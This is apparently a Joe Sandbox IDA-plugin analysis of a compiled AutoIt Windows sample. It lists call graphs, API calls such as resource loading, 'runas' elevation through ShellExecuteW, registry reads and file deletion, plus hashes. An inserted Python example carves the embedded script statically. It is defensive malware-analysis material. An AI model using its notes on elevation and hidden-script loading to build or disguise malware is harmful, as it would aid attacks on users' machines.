96478->96479 96480 1012971 96479->96480 96481 fa5722 22 API calls 96480->96481 96482 101297b 96481->96482 96832 101274e 96482->96832 96484 1012986 96485 fa511f 64 API calls 96484->96485 96486 101299b 96485->96486 96487 1012a6c 96486->96487 96488 10129bf 96486->96488 96864 1012e66 75 API calls 96487->96864 96861 1012e66 75 API calls 96488->96861 96491 10129c4 96495 1012a75 ISource 96491->96495 96862 fcd583 26 API calls 96491->96862 96493 fa50f5 40 API calls 96494 1012a91 96493->96494 96496 fa50f5 40 API calls 96494->96496 96495->96056 96498 1012aa1 96496->96498 96497 10129ed 96863 fcd583 26 API calls 96497->96863 96499 fa50f5 40 API calls 96498->96499 96501 1012abc 96499->96501 96502 fa50f5 40 API calls 96501->96502 96503 1012acc 96502->96503 96504 fa50f5 40 API calls 96503->96504 96506 1012ae7 96504->96506 96505 1012a38 96505->96493 96505->96495 96507 fa50f5 40 API calls 96506->96507 96508 1012af7 96507->96508 96509 
fa50f5 40 API calls 96508->96509 96510 1012b07 96509->96510 96511 fa50f5 40 API calls 96510->96511 96512 1012b17 96511->96512 96835 1013017 GetTempPathW GetTempFileNameW 96512->96835 96514 1012b22 96515 fce5eb 29 API calls 96514->96515 96526 1012b33 96515->96526 96516 1012bed 96845 fce678 96516->96845 96518 1012bf8 96520 1012c12 96518->96520 96521 1012bfe DeleteFileW 96518->96521 96519 fa50f5 40 API calls 96519->96526 96522 1012c91 CopyFileW 96520->96522 96528 1012c18 96520->96528 96521->96495 96523 1012ca7 DeleteFileW 96522->96523 96524 1012cb9 DeleteFileW 96522->96524 96523->96495 96858 1012fd8 CreateFileW 96524->96858 96526->96495 96526->96516 96526->96519 96836 fcdbb3 96526->96836 96865 10122ce 96528->96865 96531 1012c80 DeleteFileW 96531->96495 96533 fab578 96532->96533 96534 fab57f 96532->96534 96533->96534 97172 fc62d1 39 API calls 96533->97172 96534->95983 96536 fab5c2 96536->95983 96537->96019 96538->96031 96540 fa4ea8 GetProcAddress 96539->96540 96541 fa4ec6 96539->96541 96542 fa4eb8 96540->96542 96544 fce5eb 96541->96544 96542->96541 96543 fa4ebf FreeLibrary 96542->96543 96543->96541 96575 fce52a 96544->96575 96546 fa4eea 96546->96352 96546->96353 96548 fa4e6e GetProcAddress 96547->96548 96549 fa4e8d 96547->96549 96550 fa4e7e 96548->96550 96552 fa4f80 96549->96552 96550->96549 96551 fa4e86 FreeLibrary 96550->96551 96551->96549 96553 fbfe0b 22 API calls 96552->96553 96554 fa4f95 96553->96554 96555 fa5722 22 API calls 96554->96555 96556 fa4fa1 __fread_nolock 96555->96556 96557 fe3d1d 96556->96557 96558 fa50a5 96556->96558 96568 fa4fdc 96556->96568 96654 101304d 74 API calls 96557->96654 96643 fa42a2 CreateStreamOnHGlobal 96558->96643 96561 fe3d22 96563 fa511f 64 API calls 96561->96563 96562 fa50f5 40 API calls 96562->96568 96564 fe3d45 96563->96564 96565 fa50f5 40 API calls 96564->96565 96567 fa506e ISource 96565->96567 96567->96360 96568->96561 96568->96562 96568->96567 96649 fa511f 96568->96649 96570 fa5107 96569->96570 96571 fe3d70 96569->96571 96676 
fce8c4 96570->96676 96574 10128fe 27 API calls 96574->96368 96578 fce536 BuildCatchObjectHelperInternal 96575->96578 96576 fce544 96600 fcf2d9 20 API calls _abort 96576->96600 96578->96576 96580 fce574 96578->96580 96579 fce549 96601 fd27ec 26 API calls __cftof 96579->96601 96582 fce579 96580->96582 96583 fce586 96580->96583 96602 fcf2d9 20 API calls _abort 96582->96602 96592 fd8061 96583->96592 96586 fce58f 96587 fce595 96586->96587 96588 fce5a2 96586->96588 96603 fcf2d9 20 API calls _abort 96587->96603 96604 fce5d4 LeaveCriticalSection __fread_nolock 96588->96604 96589 fce554 __wsopen_s 96589->96546 96593 fd806d BuildCatchObjectHelperInternal 96592->96593 96605 fd2f5e EnterCriticalSection 96593->96605 96595 fd807b 96606 fd80fb 96595->96606 96599 fd80ac __wsopen_s 96599->96586 96600->96579 96601->96589 96602->96589 96603->96589 96604->96589 96605->96595 96611 fd811e 96606->96611 96607 fd8177 96624 fd4c7d 96607->96624 96611->96607 96615 fd8088 96611->96615 96622 fc918d EnterCriticalSection 96611->96622 96623 fc91a1 LeaveCriticalSection 96611->96623 96613 fd8189 96613->96615 96637 fd3405 11 API calls 2 library calls 96613->96637 96619 fd80b7 96615->96619 96616 fd81a8 96638 fc918d EnterCriticalSection 96616->96638 96642 fd2fa6 LeaveCriticalSection 96619->96642 96621 fd80be 96621->96599 96622->96611 96623->96611 96630 fd4c8a _abort 96624->96630 96625 fd4cca 96640 fcf2d9 20 API calls _abort 96625->96640 96626 fd4cb5 RtlAllocateHeap 96627 fd4cc8 96626->96627 96626->96630 96631 fd29c8 96627->96631 96630->96625 96630->96626 96639 fc4ead 7 API calls 2 library calls 96630->96639 96632 fd29d3 RtlFreeHeap 96631->96632 96636 fd29fc __dosmaperr 96631->96636 96633 fd29e8 96632->96633 96632->96636 96641 fcf2d9 20 API calls _abort 96633->96641 96635 fd29ee GetLastError 96635->96636 96636->96613 96637->96616 96638->96615 96639->96630 96640->96627 96641->96635 96642->96621 96644 fa42bc FindResourceExW 96643->96644 96648 fa42d9 96643->96648 96645 fe35ba LoadResource 96644->96645 
96644->96648 96646 fe35cf SizeofResource 96645->96646 96645->96648 96647 fe35e3 LockResource 96646->96647 96646->96648 96647->96648 96648->96568 96650 fa512e 96649->96650 96653 fe3d90 96649->96653 96655 fcece3 96650->96655 96654->96561 96658 fceaaa 96655->96658 96657 fa513c 96657->96568 96659 fceab6 BuildCatchObjectHelperInternal 96658->96659 96660 fceac2 96659->96660 96662 fceae8 96659->96662 96671 fcf2d9 20 API calls _abort 96660->96671 96673 fc918d EnterCriticalSection 96662->96673 96663 fceac7 96672 fd27ec 26 API calls __cftof 96663->96672 96666 fceaf4 96674 fcec0a 62 API calls 2 library calls 96666->96674 96668 fceb08 96675 fceb27 LeaveCriticalSection __fread_nolock 96668->96675 96670 fcead2 __wsopen_s 96670->96657 96671->96663 96672->96670 96673->96666 96674->96668 96675->96670 96679 fce8e1 96676->96679 96678 fa5118 96678->96574 96680 fce8ed BuildCatchObjectHelperInternal 96679->96680 96681 fce92d 96680->96681 96682 fce900 ___scrt_fastfail 96680->96682 96683 fce925 __wsopen_s 96680->96683 96692 fc918d EnterCriticalSection 96681->96692 96706 fcf2d9 20 API calls _abort 96682->96706 96683->96678 96686 fce937 96693 fce6f8 96686->96693 96687 fce91a 96707 fd27ec 26 API calls __cftof 96687->96707 96692->96686 96697 fce70a ___scrt_fastfail 96693->96697 96699 fce727 96693->96699 96694 fce717 96781 fcf2d9 20 API calls _abort 96694->96781 96696 fce71c 96782 fd27ec 26 API calls __cftof 96696->96782 96697->96694 96697->96699 96702 fce76a __fread_nolock 96697->96702 96708 fce96c LeaveCriticalSection __fread_nolock 96699->96708 96700 fce886 ___scrt_fastfail 96784 fcf2d9 20 API calls _abort 96700->96784 96702->96699 96702->96700 96709 fcd955 96702->96709 96716 fd8d45 96702->96716 96783 fccf78 26 API calls 4 library calls 96702->96783 96706->96687 96707->96683 96708->96683 96710 fcd976 96709->96710 96711 fcd961 96709->96711 96710->96702 96785 fcf2d9 20 API calls _abort 96711->96785 96713 fcd966 96786 fd27ec 26 API calls __cftof 96713->96786 96715 fcd971 96715->96702 96717 
98351->98302 98353 fd525e 98352->98353 98353->98357 98377 fd5147 EnterCriticalSection 98353->98377 98355 fd52d4 LeaveCriticalSection 98354->98355 98354->98357 98355->98349 98374 fd532a 98357->98374 98358->98308 98359->98318 98360->98333 98361->98309 98362->98318 98363->98322 98364->98318 98365->98319 98366->98325 98367->98324 98368->98326 98369->98329 98370->98336 98371->98340 98372->98337 98373->98349 98378 fd2fa6 LeaveCriticalSection 98374->98378 98376 fd5331 98376->98351 98377->98357 98378->98376

            Control-flow Graph

            (Rendered graph; edge list omitted. Blocks fa42de-fa449a and fe3617-fe3828 call GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary and GetSystemInfo.)
            APIs
            • GetVersionExW.KERNEL32(?), ref: 00FA430D
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • GetCurrentProcess.KERNEL32(?,0103CB64,00000000,?,?), ref: 00FA4422
            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00FA4429
            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FA4454
            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA4466
            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00FA4474
            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00FA447B
            • GetSystemInfo.KERNEL32(?,?,?), ref: 00FA44A0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
            • String ID: GetNativeSystemInfo$kernel32.dll$|O
            • API String ID: 3290436268-3101561225
            • Opcode ID: 949a3ba2e5665ba13710c7bf1a8b2c1ced015efb04cdd87ed85ca3635647b605
            • Instruction ID: db428fd356893c313805bfd74e94444304ff589f111ae06d8f229a09a99307e8
            • Opcode Fuzzy Hash: 949a3ba2e5665ba13710c7bf1a8b2c1ced015efb04cdd87ed85ca3635647b605
            • Instruction Fuzzy Hash: 73A1A2B2D1E2C0DFD731CB7970486957FA46B67300B08C899E8C5B7AC9D27A4508EBB1

            Control-flow Graph

            (Rendered graph; edge list omitted. Blocks fa42a2-fa42dd and fe35ba-fe3612 call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.)
            APIs
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FA50AA,?,?,00000000,00000000), ref: 00FA42B2
            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FA50AA,?,?,00000000,00000000), ref: 00FA42C9
            • LoadResource.KERNEL32(?,00000000,?,?,00FA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FA4F20), ref: 00FE35BE
            • SizeofResource.KERNEL32(?,00000000,?,?,00FA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FA4F20), ref: 00FE35D3
            • LockResource.KERNEL32(00FA50AA,?,?,00FA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FA4F20,?), ref: 00FE35E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
            • String ID: SCRIPT
            • API String ID: 3051347437-3967369404
            • Opcode ID: cd86ec1d4575f47597390be82608e10d8e2091500a9def6e4aa0bd22c5c81b79
            • Instruction ID: 81ff86e882178fcb0d7064f0cc615e82782d9aa0d35fb52fb829974e41b5d811
            • Opcode Fuzzy Hash: cd86ec1d4575f47597390be82608e10d8e2091500a9def6e4aa0bd22c5c81b79
            • Instruction Fuzzy Hash: 35117CB5640701BFE7218B65DD48F277BBDEBC6B61F14416AB446E6250DBB2EC009630
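            The function above resolves the embedded script the way every compiled AutoIt binary does: FindResourceExW with type 0x0000000A (RT_RCDATA) and the name SCRIPT, then LoadResource, SizeofResource and LockResource. The Python below is an added example, not part of the Joe Sandbox report and not AutoIt or Joe Sandbox code; it carves that resource statically by walking the PE resource directory, so the script can be pulled from the sample without running it. The AU3!EA06 marker is the signature that AutoIt3 places at the start of a compiled script; the function names and the minimal PE built by build_sample_pe are ours, constructed so the block runs offline.

```python
# Added example, not Joe Sandbox or AutoIt code: carve the RT_RCDATA "SCRIPT"
# resource that the FindResourceExW(?, 0x0000000A, "SCRIPT") lookup resolves,
# by walking the PE resource directory statically. Names and sample PE are ours.
import struct

RT_RCDATA = 10              # resource type 0x0000000A passed to FindResourceExW
AU3_MAGIC = b"AU3!EA06"    # signature at the start of an AutoIt3 compiled script

def _sections_and_rsrc_rva(pe):
    """Return ([(virtual_addr, raw_size, raw_ptr), ...], resource_dir_rva)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec, opt_size = (struct.unpack_from("<H", pe, e_lfanew + 6)[0],
                      struct.unpack_from("<H", pe, e_lfanew + 20)[0])
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd_base = opt + (96 if magic == 0x10B else 112)             # PE32 vs PE32+
    rsrc_rva = struct.unpack_from("<I", pe, dd_base + 2 * 8)[0]  # data directory 2 = resources
    sections = [struct.unpack_from("<III", pe, opt + opt_size + 40 * i + 12)  # VA, raw size, raw ptr
                for i in range(nsec)]
    return sections, rsrc_rva

def _rva_to_offset(sections, rva):
    for va, raw_size, raw_ptr in sections:
        if va <= rva < va + raw_size:
            return raw_ptr + (rva - va)
    raise ValueError("RVA %#x is not backed by any section" % rva)

def _entries(pe, base, dir_off):
    """Yield (id_or_name, offset_field) for one IMAGE_RESOURCE_DIRECTORY."""
    named, ids = struct.unpack_from("<HH", pe, base + dir_off + 12)
    for i in range(named + ids):
        name, off = struct.unpack_from("<II", pe, base + dir_off + 16 + 8 * i)
        if name & 0x80000000:                       # length-prefixed UTF-16LE name
            s = base + (name & 0x7FFFFFFF)
            n = struct.unpack_from("<H", pe, s)[0]
            name = pe[s + 2:s + 2 + 2 * n].decode("utf-16-le").upper()
        yield name, off

def find_resource(pe, res_type=RT_RCDATA, res_name="SCRIPT"):
    """Return (file_offset, size) of the first type/name match, or None."""
    sections, rsrc_rva = _sections_and_rsrc_rva(pe)
    if not rsrc_rva:
        return None
    base = _rva_to_offset(sections, rsrc_rva)
    for t, t_off in _entries(pe, base, 0):                          # level 1: type
        if t != res_type or not (t_off & 0x80000000):
            continue
        for n, n_off in _entries(pe, base, t_off & 0x7FFFFFFF):     # level 2: name
            if n != res_name.upper() or not (n_off & 0x80000000):
                continue
            for _lang, d_off in _entries(pe, base, n_off & 0x7FFFFFFF):  # level 3: language
                if not (d_off & 0x80000000):                        # leaf: data entry
                    data_rva, size = struct.unpack_from("<II", pe, base + d_off)
                    return _rva_to_offset(sections, data_rva), size
    return None

def carve_script(pe):
    """Return the SCRIPT resource bytes, or None when the PE has none."""
    hit = find_resource(pe)
    return None if hit is None else pe[hit[0]:hit[0] + hit[1]]

def build_sample_pe(payload=AU3_MAGIC + b"\0" * 8):
    """Constructed test input: a minimal PE32 whose only section is .rsrc,
    holding RT_RCDATA / "SCRIPT" / language 0 -> payload."""
    rsrc_rva, rsrc_ptr, rsrc_size = 0x2000, 0x400, 0x400

    def directory(name, off):                       # one-entry directory, 24 bytes
        named = 1 if name & 0x80000000 else 0
        return struct.pack("<IIHHHHII", 0, 0, 0, 0, named, 1 - named, name, off)

    rsrc = (directory(RT_RCDATA, 0x80000018)          # root     @0x00 -> type dir @0x18
            + directory(0x80000058, 0x80000030)      # type dir @0x18 -> name dir @0x30
            + directory(0, 0x48)                     # name dir @0x30 -> data entry @0x48
            + struct.pack("<IIII", rsrc_rva + 0x70, len(payload), 0, 0)    # data entry
            + (struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le")).ljust(0x18, b"\0")  # @0x58
            + payload).ljust(rsrc_size, b"\0")       # payload @0x70
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(96, b"\0")                          # PE32, data dirs follow
    opt += b"\0" * 16 + struct.pack("<II", rsrc_rva, len(rsrc)) + b"\0" * 104
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, rsrc_size,
                      rsrc_ptr, 0, 0, 0, 0, 0x40000040)
    return (dos + coff + opt + sec).ljust(rsrc_ptr, b"\0") + rsrc

if __name__ == "__main__":
    import sys
    blob = carve_script(open(sys.argv[1], "rb").read())
    print("no SCRIPT resource" if blob is None else
          "%d bytes, AutoIt signature: %s" % (len(blob), blob.startswith(AU3_MAGIC)))
```

            Run it as python carve_au3.py 8t1uarSZFV.exe; a carved blob that starts with AU3!EA06 confirms the compiled-AutoIt detection and is the input an AutoIt decompiler expects. The walk stops at the type/name/language depth that FindResourceExW itself uses, and the name comparison is case-insensitive, as the Windows lookup is.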

            Control-flow Graph

            APIs
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA2B6B
              • Part of subcall function 00FA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01071418,?,00FA2E7F,?,?,?,00000000), ref: 00FA3A78
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • GetForegroundWindow.USER32(runas,?,?,?,?,?,01062224), ref: 00FE2C10
            • ShellExecuteW.SHELL32(00000000,?,?,01062224), ref: 00FE2C17
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
            • String ID: runas
            • API String ID: 448630720-4000483414
            • Opcode ID: 4a411220d9d924829277c920e834dd8beea132e55e83c424839d4009532f4cef
            • Instruction ID: 02ddf8968be83cca8e19a1ff745ed1948f68494836249a437dac04ab8749e099
            • Opcode Fuzzy Hash: 4a411220d9d924829277c920e834dd8beea132e55e83c424839d4009532f4cef
            • Instruction Fuzzy Hash: C611E4B16083416BCB54FF24DC419AE77A8AFD3390F44042DF0C252092CF3D8609B322
            APIs
            • lstrlenW.KERNEL32(?,00FE5222), ref: 0100DBCE
            • GetFileAttributesW.KERNELBASE(?), ref: 0100DBDD
            • FindFirstFileW.KERNELBASE(?,?), ref: 0100DBEE
            • FindClose.KERNEL32(00000000), ref: 0100DBFA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileFind$AttributesCloseFirstlstrlen
            • String ID:
            • API String ID: 2695905019-0
            • Opcode ID: e9c95fef3de83700009139ebd1bb0e3f6fc41f76cff52aa3ef7b1af5dc57ab29
            • Instruction ID: 4628b325a2e229333937865814c3fe617765af5e958bd09b99a25357f2167ac3
            • Opcode Fuzzy Hash: e9c95fef3de83700009139ebd1bb0e3f6fc41f76cff52aa3ef7b1af5dc57ab29
            • Instruction Fuzzy Hash: 86F0A73141052597B2316BFC990D86A3BAC9E01334F004743F8B5D10D0EBB5595447A5
            APIs
            • GetInputState.USER32 ref: 00FAD807
            • timeGetTime.WINMM ref: 00FADA07
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FADB28
            • TranslateMessage.USER32(?), ref: 00FADB7B
            • DispatchMessageW.USER32(?), ref: 00FADB89
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FADB9F
            • Sleep.KERNEL32(0000000A), ref: 00FADBB1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
            • String ID:
            • API String ID: 2189390790-0
            • Opcode ID: b78504acaf549d450649f80be42b8e0eb42caa2365b627091401bc2e67b147b1
            • Instruction ID: 1b0db80f5840cf36f9f4982a58f31efb72f0ac5e8758b965033b756d527c2ace
            • Opcode Fuzzy Hash: b78504acaf549d450649f80be42b8e0eb42caa2365b627091401bc2e67b147b1
            • Instruction Fuzzy Hash: EF4234B0A08305DFD738CF24C884BBAB7E4BF86324F14451DE596876A1D779E844EB92

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00FA2D07
            • RegisterClassExW.USER32(00000030), ref: 00FA2D31
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA2D42
            • InitCommonControlsEx.COMCTL32(?), ref: 00FA2D5F
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA2D6F
            • LoadIconW.USER32(000000A9), ref: 00FA2D85
            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA2D94
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
            • API String ID: 2914291525-1005189915
            • Opcode ID: 2f6f359a3379f1a4ec5c69c4d877f8b132efe440e327110c64ada6b8f3058e5e
            • Instruction ID: 3f189e5175ce6b0f8072710c8c53630487f9da0b2e1f29a0be39179359be84ee
            • Opcode Fuzzy Hash: 2f6f359a3379f1a4ec5c69c4d877f8b132efe440e327110c64ada6b8f3058e5e
            • Instruction Fuzzy Hash: 4321E4B5D11348AFEB20DFA4E949ADDBBB8FB08700F00811AF991F6284D7BA45408F90

            Control-flow Graph

            (Rendered graph; edge list omitted. Blocks fe065b-fe0983 call GetFileType, GetLastError and CloseHandle, plus the CRT helpers fe039a (CreateFileW), fe042f, fcf2a3, fcf2c6, fcf2d9, fd5221, fd516a, fd5333, fd86ae, fe014d and fe05ab.)
            APIs
              • Part of subcall function 00FE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00FE0704,?,?,00000000,?,00FE0704,00000000,0000000C), ref: 00FE03B7
            • GetLastError.KERNEL32 ref: 00FE076F
            • __dosmaperr.LIBCMT ref: 00FE0776
            • GetFileType.KERNELBASE(00000000), ref: 00FE0782
            • GetLastError.KERNEL32 ref: 00FE078C
            • __dosmaperr.LIBCMT ref: 00FE0795
            • CloseHandle.KERNEL32(00000000), ref: 00FE07B5
            • CloseHandle.KERNEL32(?), ref: 00FE08FF
            • GetLastError.KERNEL32 ref: 00FE0931
            • __dosmaperr.LIBCMT ref: 00FE0938
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
            • String ID: H
            • API String ID: 4237864984-2852464175
            • Opcode ID: 6406311a44750863ae23505ab53d591199913ab97fea05aa68a1aa60ecda4a7f
            • Instruction ID: 19f6e17bdd8faa743284517606e2896ebc153416659939627d8bcb3a4b0f1dc4
            • Opcode Fuzzy Hash: 6406311a44750863ae23505ab53d591199913ab97fea05aa68a1aa60ecda4a7f
            • Instruction Fuzzy Hash: 32A14632E001858FDF19EF68DC52BAE7BA1AB06320F14015DF851EB391CB799D52EB91

            Control-flow Graph

            APIs
              • Part of subcall function 00FA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01071418,?,00FA2E7F,?,?,?,00000000), ref: 00FA3A78
              • Part of subcall function 00FA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FA3379
            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA356A
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FE318D
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FE31CE
            • RegCloseKey.ADVAPI32(?), ref: 00FE3210
            • _wcslen.LIBCMT ref: 00FE3277
            • _wcslen.LIBCMT ref: 00FE3286
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
            • API String ID: 98802146-2727554177
            • Opcode ID: faef4ea50563803752009826224c54cf283ef89264dafabe27391980aee79e7f
            • Instruction ID: a24aaa1171ec56dc338085fbc9b2fefba75a913e0b0ea79ecf2552ba336fcb1a
            • Opcode Fuzzy Hash: faef4ea50563803752009826224c54cf283ef89264dafabe27391980aee79e7f
            • Instruction Fuzzy Hash: BE71A2B18043019ED324DF25DC859ABB7E8FF85350F40882EF5C5E7154DB799A48DB61

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00FA2B8E
            • LoadCursorW.USER32(00000000,00007F00), ref: 00FA2B9D
            • LoadIconW.USER32(00000063), ref: 00FA2BB3
            • LoadIconW.USER32(000000A4), ref: 00FA2BC5
            • LoadIconW.USER32(000000A2), ref: 00FA2BD7
